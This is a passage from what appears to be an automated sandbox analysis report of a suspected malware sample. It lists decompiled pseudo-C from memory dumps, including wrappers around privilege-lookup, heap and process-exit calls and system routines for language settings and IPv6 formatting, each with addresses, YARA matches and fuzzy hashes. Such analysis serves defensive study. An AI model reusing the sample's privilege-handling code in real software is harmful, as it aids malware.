				_t14 = LookupPrivilegeValueW(_a4, _a8, _a12); // executed
				return _t14;
			}






                                                                                                                                                              0x00418629
                                                                                                                                                              0x00418633
                                                                                                                                                              0x00418642
                                                                                                                                                              0x0041864a
                                                                                                                                                              0x00418660
                                                                                                                                                              0x00418664

                                                                                                                                                              APIs
                                                                                                                                                              • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFA2,0040CFA2,00000041,00000000,?,00408B65), ref: 00418660
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000F.00000002.2233553109.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: LookupPrivilegeValue
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3899507212-0
                                                                                                                                                              • Opcode ID: 399899a4b91de17e6d297fe4dc82d0fea68e0f5f7307f8cbd88a2d8ed7a65fc0
                                                                                                                                                              • Instruction ID: 6f3b78acfad7cd69111e35170fefb2e61d1269f3af7e8e1fa3a8c166456d2147
                                                                                                                                                              • Opcode Fuzzy Hash: 399899a4b91de17e6d297fe4dc82d0fea68e0f5f7307f8cbd88a2d8ed7a65fc0
                                                                                                                                                              • Instruction Fuzzy Hash: CBF0E5792082806FD701DF669C80EE33B68DF45240F044599FCD94B202C934A806CBB0
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 004184D0, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                              			E004184D0(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
				char _t10;
				void* _t15;

				_t3 = _a4 + 0xc74; // 0xc74
				E00418DC0(_t15, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
				return _t10;
			}





                                                                                                                                                              0x004184df
                                                                                                                                                              0x004184e7
                                                                                                                                                              0x004184fd
                                                                                                                                                              0x00418501

                                                                                                                                                              APIs
                                                                                                                                                              • RtlFreeHeap.NTDLL(00000060,00408AF3,?,?,00408AF3,00000060,00000000,00000000,?,?,00408AF3,?,00000000), ref: 004184FD
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000F.00000002.2233553109.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: FreeHeap
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3298025750-0
                                                                                                                                                              • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                                                                                                                              • Instruction ID: 0c1265b7fbf046cbfd36917309396888787f1b5b9f48543de1c0af89871077f5
                                                                                                                                                              • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                                                                                                                              • Instruction Fuzzy Hash: 2EE01AB12002046BD714DF59DC45EA777ACAF88750F014559F90857241CA30E9108AB0
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00418490, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                              			E00418490(intOrPtr _a4, void* _a8, long _a12, long _a16) {
				void* _t10;
				void* _t15;

				E00418DC0(_t15, _a4, _a4 + 0xc70,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x34);
				_t10 = RtlAllocateHeap(_a8, _a12, _a16); // executed
				return _t10;
			}





                                                                                                                                                              0x004184a7
                                                                                                                                                              0x004184bd
                                                                                                                                                              0x004184c1

                                                                                                                                                              APIs
                                                                                                                                                              • RtlAllocateHeap.NTDLL(00413516,?,00413C8F,00413C8F,?,00413516,?,?,?,?,?,00000000,00408AF3,?), ref: 004184BD
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000F.00000002.2233553109.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: AllocateHeap
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1279760036-0
                                                                                                                                                              • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                                                                                                                              • Instruction ID: d4cd8ba0fc8cb19801f053331f4cf649e26225416c3eadc5d6da7764d9533391
                                                                                                                                                              • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                                                                                                                              • Instruction Fuzzy Hash: 81E012B1200208ABDB14EF99DC41EA777ACAF88654F118559FA085B282CA30F9108AB0
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00418630, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                              			E00418630(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
				int _t10;
				void* _t15;

				_t3 = _a4 + 0xc8c; // 0x8bec97e1
				E00418DC0(_t15, _a4, _t3,  *((intOrPtr*)(_a4 + 0xa18)), 0, 0x46);
				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
				return _t10;
			}





                                                                                                                                                              0x00418642
                                                                                                                                                              0x0041864a
                                                                                                                                                              0x00418660
                                                                                                                                                              0x00418664

                                                                                                                                                              APIs
                                                                                                                                                              • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFA2,0040CFA2,00000041,00000000,?,00408B65), ref: 00418660
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000F.00000002.2233553109.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: LookupPrivilegeValue
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3899507212-0
                                                                                                                                                              • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                                                                                                                              • Instruction ID: a95af6b202be8dae21372797db95a078404a8f30fafd20f5c772dce95c9aa66f
                                                                                                                                                              • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                                                                                                                              • Instruction Fuzzy Hash: 31E01AB12002086BDB10DF49DC85EE737ADAF89650F018559FA0857241CA34E8108BF5
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00418510, Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                              			E00418510(intOrPtr _a4, int _a8) {
				intOrPtr _t8;
				void* _t10;

				_t5 = _a4;
				_t8 =  *((intOrPtr*)(_a4 + 0xa14));
				E00418DC0(_t10, _t5, _t5 + 0xc7c, _t8, 0, 0x36);
				ExitProcess(_a8);
			}





                                                                                                                                                              0x00418513
                                                                                                                                                              0x00418516
                                                                                                                                                              0x0041852a
                                                                                                                                                              0x00418538

                                                                                                                                                              APIs
                                                                                                                                                              • ExitProcess.KERNELBASE(?,?,00000000,?,?,?), ref: 00418538
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000F.00000002.2233553109.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ExitProcess
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 621844428-0
                                                                                                                                                              • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                                                                                                                              • Instruction ID: 7205fd5e3e27dabd4e13006f85928de99448ffddaf0958f387cae24292a3a6f6
                                                                                                                                                              • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                                                                                                                              • Instruction Fuzzy Hash: ACD012716003147BD620DF99DC85FD7779CDF49750F018469BA1C5B241C931BA0086E1
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Non-executed Functions

                                                                                                                                                              Function 00968788, Relevance: 19.7, APIs: 6, Strings: 5, Instructions: 431COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 94%
                                                                                                                                                              			E00968788(signed int __ecx, void* __edx, signed int _a4) {
				signed int _v8;
				short* _v12;
				void* _v16;
				signed int _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				char _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				char _v68;
				void* _t216;
				intOrPtr _t231;
				short* _t235;
				intOrPtr _t257;
				short* _t261;
				intOrPtr _t284;
				intOrPtr _t288;
				void* _t314;
				signed int _t318;
				short* _t319;
				intOrPtr _t321;
				void* _t328;
				void* _t329;
				char* _t332;
				signed int _t333;
				signed int* _t334;
				void* _t335;
				void* _t338;
				void* _t339;

				_t328 = __edx;
				_t322 = __ecx;
				_t318 = 0;
				_t334 = _a4;
				_v8 = 0;
				_v28 = 0;
				_v48 = 0;
				_v20 = 0;
				_v40 = 0;
				_v32 = 0;
				_v52 = 0;
				if(_t334 == 0) {
					_t329 = 0xc000000d;
					L49:
					_t334[0x11] = _v56;
					 *_t334 =  *_t334 | 0x00000800;
					_t334[0x12] = _v60;
					_t334[0x13] = _v28;
					_t334[0x17] = _v20;
					_t334[0x16] = _v48;
					_t334[0x18] = _v40;
					_t334[0x14] = _v32;
					_t334[0x15] = _v52;
					return _t329;
				}
				_v56 = 0;
				if(E00968460(__ecx, L"WindowsExcludedProcs",  &_v44,  &_v24,  &_v8) >= 0) {
					_v56 = 1;
					if(_v8 != 0) {
						_t207 = E0094E025(__ecx,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
					}
					_push(1);
					_v8 = _t318;
					E0096718A(_t207);
					_t335 = _t335 + 4;
				}
				_v60 = _v60 | 0xffffffff;
				if(E00968460(_t322, L"Kernel-MUI-Number-Allowed",  &_v44,  &_v24,  &_v8) >= 0) {
					_t333 =  *_v8;
					_v60 = _t333;
					_t314 = E0094E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
					_push(_t333);
					_v8 = _t318;
					E0096718A(_t314);
					_t335 = _t335 + 4;
				}
				_t216 = E00968460(_t322, L"Kernel-MUI-Language-Allowed",  &_v44,  &_v24,  &_v8);
				_t332 = ";";
				if(_t216 < 0) {
					L17:
					if(E00968460(_t322, L"Kernel-MUI-Language-Disallowed",  &_v44,  &_v24,  &_v8) < 0) {
						L30:
						if(E00968460(_t322, L"Kernel-MUI-Language-SKU",  &_v44,  &_v24,  &_v8) < 0) {
							L46:
							_t329 = 0;
							L47:
							if(_v8 != _t318) {
								E0094E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
							}
							if(_v28 != _t318) {
								if(_v20 != _t318) {
									E0094E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
									_v20 = _t318;
									_v40 = _t318;
								}
							}
							goto L49;
						}
						_t231 = _v24;
						_t322 = _t231 + 4;
						_push(_t231);
						_v52 = _t322;
						E0096718A(_t231);
						if(_t322 == _t318) {
							_v32 = _t318;
						} else {
							_v32 = E0094E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
						}
						if(_v32 == _t318) {
							_v52 = _t318;
							L58:
							_t329 = 0xc0000017;
							goto L47;
						} else {
							E00942340(_v32, _v8, _v24);
							_v16 = _v32;
							_a4 = _t318;
							_t235 = E0095E679(_v32, _t332);
							while(1) {
								_t319 = _t235;
								if(_t319 == 0) {
									break;
								}
								 *_t319 = 0;
								_t321 = _t319 + 2;
								E0094E2A8(_t322,  &_v68, _v16);
								if(E00965553(_t328,  &_v68,  &_v36) != 0) {
									_a4 = _a4 + 1;
								}
								_v16 = _t321;
								_t235 = E0095E679(_t321, _t332);
								_pop(_t322);
							}
							_t236 = _v16;
							if( *_v16 != _t319) {
								E0094E2A8(_t322,  &_v68, _t236);
								if(E00965553(_t328,  &_v68,  &_v36) != 0) {
									_a4 = _a4 + 1;
								}
							}
							if(_a4 == 0) {
								E0094E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v32);
								_v52 = _v52 & 0x00000000;
								_v32 = _v32 & 0x00000000;
							}
							if(_v8 != 0) {
								E0094E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
							}
							_v8 = _v8 & 0x00000000;
							_t318 = 0;
							goto L46;
						}
					}
					_t257 = _v24;
					_t322 = _t257 + 4;
					_push(_t257);
					_v40 = _t322;
					E0096718A(_t257);
					_t338 = _t335 + 4;
					if(_t322 == _t318) {
						_v20 = _t318;
					} else {
						_v20 = E0094E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
					}
					if(_v20 == _t318) {
						_v40 = _t318;
						goto L58;
					} else {
						E00942340(_v20, _v8, _v24);
						_v16 = _v20;
						_a4 = _t318;
						_t261 = E0095E679(_v20, _t332);
						_t335 = _t338 + 0x14;
						while(1) {
							_v12 = _t261;
							if(_t261 == _t318) {
								break;
							}
							_v12 = _v12 + 2;
							 *_v12 = 0;
							E0094E2A8(_v12,  &_v68, _v16);
							if(E00965553(_t328,  &_v68,  &_v36) != 0) {
								_a4 = _a4 + 1;
							}
							_v16 = _v12;
							_t261 = E0095E679(_v12, _t332);
							_pop(_t322);
						}
						_t269 = _v16;
						if( *_v16 != _t318) {
							E0094E2A8(_t322,  &_v68, _t269);
							if(E00965553(_t328,  &_v68,  &_v36) != 0) {
								_a4 = _a4 + 1;
							}
						}
						if(_a4 == _t318) {
							E0094E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
							_v40 = _t318;
							_v20 = _t318;
						}
						if(_v8 != _t318) {
							E0094E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
						}
						_v8 = _t318;
						goto L30;
					}
				}
				_t284 = _v24;
				_t322 = _t284 + 4;
				_push(_t284);
				_v48 = _t322;
				E0096718A(_t284);
				_t339 = _t335 + 4;
				if(_t322 == _t318) {
					_v28 = _t318;
				} else {
					_v28 = E0094E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
				}
				if(_v28 == _t318) {
					_v48 = _t318;
					goto L58;
				} else {
					E00942340(_v28, _v8, _v24);
					_v16 = _v28;
					_a4 = _t318;
					_t288 = E0095E679(_v28, _t332);
					_t335 = _t339 + 0x14;
					while(1) {
						_v12 = _t288;
						if(_t288 == _t318) {
							break;
						}
						_v12 = _v12 + 2;
						 *_v12 = 0;
						E0094E2A8(_v12,  &_v68, _v16);
						if(E00965553(_t328,  &_v68,  &_v36) != 0) {
							_a4 = _a4 + 1;
						}
						_v16 = _v12;
						_t288 = E0095E679(_v12, _t332);
						_pop(_t322);
					}
					_t296 = _v16;
					if( *_v16 != _t318) {
						E0094E2A8(_t322,  &_v68, _t296);
						if(E00965553(_t328,  &_v68,  &_v36) != 0) {
							_a4 = _a4 + 1;
						}
					}
					if(_a4 == _t318) {
						E0094E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v28);
						_v48 = _t318;
						_v28 = _t318;
					}
					if(_v8 != _t318) {
						E0094E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
					}
					_v8 = _t318;
					goto L17;
				}
			}





































                                                                                                                                                              0x00968788
                                                                                                                                                              0x00968788
                                                                                                                                                              0x00968791
                                                                                                                                                              0x00968794
                                                                                                                                                              0x00968798
                                                                                                                                                              0x0096879b
                                                                                                                                                              0x0096879e
                                                                                                                                                              0x009687a1
                                                                                                                                                              0x009687a4
                                                                                                                                                              0x009687a7
                                                                                                                                                              0x009687aa
                                                                                                                                                              0x009687af
                                                                                                                                                              0x009b1ad3
                                                                                                                                                              0x00968b0a
                                                                                                                                                              0x00968b0d
                                                                                                                                                              0x00968b13
                                                                                                                                                              0x00968b19
                                                                                                                                                              0x00968b1f
                                                                                                                                                              0x00968b25
                                                                                                                                                              0x00968b2b
                                                                                                                                                              0x00968b31
                                                                                                                                                              0x00968b37
                                                                                                                                                              0x00968b3d
                                                                                                                                                              0x00968b46
                                                                                                                                                              0x00968b46
                                                                                                                                                              0x009687c6
                                                                                                                                                              0x009687d0
                                                                                                                                                              0x009b1ae0
                                                                                                                                                              0x009b1ae6
                                                                                                                                                              0x009b1af8
                                                                                                                                                              0x009b1af8
                                                                                                                                                              0x009b1afd
                                                                                                                                                              0x009b1afe
                                                                                                                                                              0x009b1b01
                                                                                                                                                              0x009b1b06
                                                                                                                                                              0x009b1b06
                                                                                                                                                              0x009687d6
                                                                                                                                                              0x009687f2
                                                                                                                                                              0x009687f7
                                                                                                                                                              0x00968807
                                                                                                                                                              0x0096880a
                                                                                                                                                              0x0096880f
                                                                                                                                                              0x00968810
                                                                                                                                                              0x00968813
                                                                                                                                                              0x00968818
                                                                                                                                                              0x00968818
                                                                                                                                                              0x0096882c
                                                                                                                                                              0x00968831
                                                                                                                                                              0x00968838
                                                                                                                                                              0x00968908
                                                                                                                                                              0x00968920
                                                                                                                                                              0x009689f0
                                                                                                                                                              0x00968a08
                                                                                                                                                              0x00968af6
                                                                                                                                                              0x00968af6
                                                                                                                                                              0x00968af8
                                                                                                                                                              0x00968afb
                                                                                                                                                              0x009b1beb
                                                                                                                                                              0x009b1beb
                                                                                                                                                              0x00968b04
                                                                                                                                                              0x009b1bf8
                                                                                                                                                              0x009b1c0e
                                                                                                                                                              0x009b1c13
                                                                                                                                                              0x009b1c16
                                                                                                                                                              0x009b1c16
                                                                                                                                                              0x009b1bf8
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00968b04
                                                                                                                                                              0x00968a0e
                                                                                                                                                              0x00968a11
                                                                                                                                                              0x00968a14
                                                                                                                                                              0x00968a15
                                                                                                                                                              0x00968a18
                                                                                                                                                              0x00968a22
                                                                                                                                                              0x00968b59
                                                                                                                                                              0x00968a28
                                                                                                                                                              0x00968a3c
                                                                                                                                                              0x00968a3c
                                                                                                                                                              0x00968a42
                                                                                                                                                              0x009b1bb0
                                                                                                                                                              0x009b1b11
                                                                                                                                                              0x009b1b11
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00968a48
                                                                                                                                                              0x00968a51
                                                                                                                                                              0x00968a5b
                                                                                                                                                              0x00968a5e
                                                                                                                                                              0x00968a61
                                                                                                                                                              0x00968a69
                                                                                                                                                              0x00968a69
                                                                                                                                                              0x00968a6d
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00968a74
                                                                                                                                                              0x00968a7c
                                                                                                                                                              0x00968a7d
                                                                                                                                                              0x00968a91
                                                                                                                                                              0x00968a93
                                                                                                                                                              0x00968a93
                                                                                                                                                              0x00968a98
                                                                                                                                                              0x00968a9b
                                                                                                                                                              0x00968aa1
                                                                                                                                                              0x00968aa1
                                                                                                                                                              0x00968aa4
                                                                                                                                                              0x00968aaa
                                                                                                                                                              0x00968ab1
                                                                                                                                                              0x00968ac5
                                                                                                                                                              0x00968ac7
                                                                                                                                                              0x00968ac7
                                                                                                                                                              0x00968ac5
                                                                                                                                                              0x00968ace
                                                                                                                                                              0x009b1bc9
                                                                                                                                                              0x009b1bce
                                                                                                                                                              0x009b1bd2
                                                                                                                                                              0x009b1bd2
                                                                                                                                                              0x00968ad8
                                                                                                                                                              0x00968aeb
                                                                                                                                                              0x00968aeb
                                                                                                                                                              0x00968af0
                                                                                                                                                              0x00968af4
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00968af4
                                                                                                                                                              0x00968a42
                                                                                                                                                              0x00968926
                                                                                                                                                              0x00968929
                                                                                                                                                              0x0096892c
                                                                                                                                                              0x0096892d
                                                                                                                                                              0x00968930
                                                                                                                                                              0x00968935
                                                                                                                                                              0x0096893a
                                                                                                                                                              0x00968b51
                                                                                                                                                              0x00968940
                                                                                                                                                              0x00968954
                                                                                                                                                              0x00968954
                                                                                                                                                              0x0096895a
                                                                                                                                                              0x009b1b63
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00968960
                                                                                                                                                              0x00968969
                                                                                                                                                              0x00968973
                                                                                                                                                              0x00968976
                                                                                                                                                              0x00968979
                                                                                                                                                              0x0096897e
                                                                                                                                                              0x00968981
                                                                                                                                                              0x00968981
                                                                                                                                                              0x00968986
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009b1b6e
                                                                                                                                                              0x009b1b74
                                                                                                                                                              0x009b1b7b
                                                                                                                                                              0x009b1b8f
                                                                                                                                                              0x009b1b91
                                                                                                                                                              0x009b1b91
                                                                                                                                                              0x009b1b99
                                                                                                                                                              0x009b1b9c
                                                                                                                                                              0x009b1ba2
                                                                                                                                                              0x009b1ba2
                                                                                                                                                              0x0096898c
                                                                                                                                                              0x00968992
                                                                                                                                                              0x00968999
                                                                                                                                                              0x009689ad
                                                                                                                                                              0x009b1ba8
                                                                                                                                                              0x009b1ba8
                                                                                                                                                              0x009689ad
                                                                                                                                                              0x009689b6
                                                                                                                                                              0x009689c8
                                                                                                                                                              0x009689cd
                                                                                                                                                              0x009689d0
                                                                                                                                                              0x009689d0
                                                                                                                                                              0x009689d6
                                                                                                                                                              0x009689e8
                                                                                                                                                              0x009689e8
                                                                                                                                                              0x009689ed
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009689ed
                                                                                                                                                              0x0096895a
                                                                                                                                                              0x0096883e
                                                                                                                                                              0x00968841
                                                                                                                                                              0x00968844
                                                                                                                                                              0x00968845
                                                                                                                                                              0x00968848
                                                                                                                                                              0x0096884d
                                                                                                                                                              0x00968852
                                                                                                                                                              0x00968b49
                                                                                                                                                              0x00968858
                                                                                                                                                              0x0096886c
                                                                                                                                                              0x0096886c
                                                                                                                                                              0x00968872
                                                                                                                                                              0x009b1b0e
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00968878
                                                                                                                                                              0x00968881
                                                                                                                                                              0x0096888b
                                                                                                                                                              0x0096888e
                                                                                                                                                              0x00968891
                                                                                                                                                              0x00968896
                                                                                                                                                              0x00968899
                                                                                                                                                              0x00968899
                                                                                                                                                              0x0096889e
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009b1b21
                                                                                                                                                              0x009b1b27
                                                                                                                                                              0x009b1b2e
                                                                                                                                                              0x009b1b42
                                                                                                                                                              0x009b1b44
                                                                                                                                                              0x009b1b44
                                                                                                                                                              0x009b1b4c
                                                                                                                                                              0x009b1b4f
                                                                                                                                                              0x009b1b55
                                                                                                                                                              0x009b1b55
                                                                                                                                                              0x009688a4
                                                                                                                                                              0x009688aa
                                                                                                                                                              0x009688b1
                                                                                                                                                              0x009688c5
                                                                                                                                                              0x009b1b5b
                                                                                                                                                              0x009b1b5b
                                                                                                                                                              0x009688c5
                                                                                                                                                              0x009688ce
                                                                                                                                                              0x009688e0
                                                                                                                                                              0x009688e5
                                                                                                                                                              0x009688e8
                                                                                                                                                              0x009688e8
                                                                                                                                                              0x009688ee
                                                                                                                                                              0x00968900
                                                                                                                                                              0x00968900
                                                                                                                                                              0x00968905
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00968905

                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              • Kernel-MUI-Number-Allowed, xrefs: 009687E6
                                                                                                                                                              • WindowsExcludedProcs, xrefs: 009687C1
                                                                                                                                                              • Kernel-MUI-Language-Disallowed, xrefs: 00968914
                                                                                                                                                              • Kernel-MUI-Language-SKU, xrefs: 009689FC
                                                                                                                                                              • Kernel-MUI-Language-Allowed, xrefs: 00968827
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000F.00000002.2233788008.0000000000930000.00000040.00000001.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                              • Associated: 0000000F.00000002.2233781568.0000000000920000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 0000000F.00000002.2233884852.0000000000A10000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 0000000F.00000002.2233899642.0000000000A20000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 0000000F.00000002.2233918032.0000000000A24000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 0000000F.00000002.2233924942.0000000000A27000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 0000000F.00000002.2233931438.0000000000A30000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 0000000F.00000002.2234039934.0000000000A90000.00000040.00000001.sdmp Download File
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: _wcspbrk
                                                                                                                                                              • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                                                                                                                              • API String ID: 402402107-258546922
                                                                                                                                                              • Opcode ID: 42d6b28ed2d42e7911f76f528d8e63777181eb8efa33692cb41f1e9498121ec9
                                                                                                                                                              • Instruction ID: 6ffa5241163be458eeecb8fce4fc9da3c752071e4ca8b5ee2ddfd3ed3224f487
                                                                                                                                                              • Opcode Fuzzy Hash: 42d6b28ed2d42e7911f76f528d8e63777181eb8efa33692cb41f1e9498121ec9
                                                                                                                                                              • Instruction Fuzzy Hash: 04F1F4B2D00209EFCF11EFA5C981EEEBBB8FF48300F14456AE515A7211EB359A45DB60
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 009813CB, Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 195COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 38%
                                                                                                                                                              			E009813CB(intOrPtr* _a4, intOrPtr _a8) {
				char _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				char _v24;
				intOrPtr _t71;
				signed int _t78;
				signed int _t86;
				char _t90;
				signed int _t91;
				signed int _t96;
				intOrPtr _t108;
				signed int _t114;
				void* _t115;
				intOrPtr _t128;
				intOrPtr* _t129;
				void* _t130;

				_t129 = _a4;
				_t128 = _a8;
				_t116 = 0;
				_t71 = _t128 + 0x5c;
				_v8 = 8;
				_v20 = _t71;
				if( *_t129 == 0) {
					if( *((intOrPtr*)(_t129 + 2)) != 0 ||  *((intOrPtr*)(_t129 + 4)) != 0 ||  *((intOrPtr*)(_t129 + 6)) != 0 ||  *(_t129 + 0xc) == 0) {
						goto L5;
					} else {
						_t96 =  *(_t129 + 8) & 0x0000ffff;
						if(_t96 != 0) {
							L38:
							if(_t96 != 0xffff ||  *(_t129 + 0xa) != _t116) {
								goto L5;
							} else {
								_push( *(_t129 + 0xf) & 0x000000ff);
								_push( *(_t129 + 0xe) & 0x000000ff);
								_push( *(_t129 + 0xd) & 0x000000ff);
								_t86 = E00977707(_t128, _t71 - _t128 >> 1, L"::ffff:0:%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff);
								L36:
								return _t128 + _t86 * 2;
							}
						}
						_t114 =  *(_t129 + 0xa) & 0x0000ffff;
						if(_t114 == 0) {
							L33:
							_t115 = 0x942926;
							L35:
							_push( *(_t129 + 0xf) & 0x000000ff);
							_push( *(_t129 + 0xe) & 0x000000ff);
							_push( *(_t129 + 0xd) & 0x000000ff);
							_push( *(_t129 + 0xc) & 0x000000ff);
							_t86 = E00977707(_t128, _t71 - _t128 >> 1, L"::%hs%u.%u.%u.%u", _t115);
							goto L36;
						}
						if(_t114 != 0xffff) {
							_t116 = 0;
							goto L38;
						}
						if(_t114 != 0) {
							_t115 = 0x949cac;
							goto L35;
						}
						goto L33;
					}
				} else {
					L5:
					_a8 = _t116;
					_a4 = _t116;
					_v12 = _t116;
					if(( *(_t129 + 8) & 0x0000fffd) == 0) {
						if( *(_t129 + 0xa) == 0xfe5e) {
							_v8 = 6;
						}
					}
					_t90 = _v8;
					if(_t90 <= _t116) {
						L11:
						if(_a8 - _a4 <= 1) {
							_a8 = _t116;
							_a4 = _t116;
						}
						_t91 = 0;
						if(_v8 <= _t116) {
							L22:
							if(_v8 < 8) {
								_push( *(_t129 + 0xf) & 0x000000ff);
								_push( *(_t129 + 0xe) & 0x000000ff);
								_push( *(_t129 + 0xd) & 0x000000ff);
								_t128 = _t128 + E00977707(_t128, _t71 - _t128 >> 1, L":%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff) * 2;
							}
							return _t128;
						} else {
							L14:
							L14:
							if(_a4 > _t91 || _t91 >= _a8) {
								if(_t91 != _t116 && _t91 != _a8) {
									_push(":");
									_push(_t71 - _t128 >> 1);
									_push(_t128);
									_t128 = _t128 + E00977707() * 2;
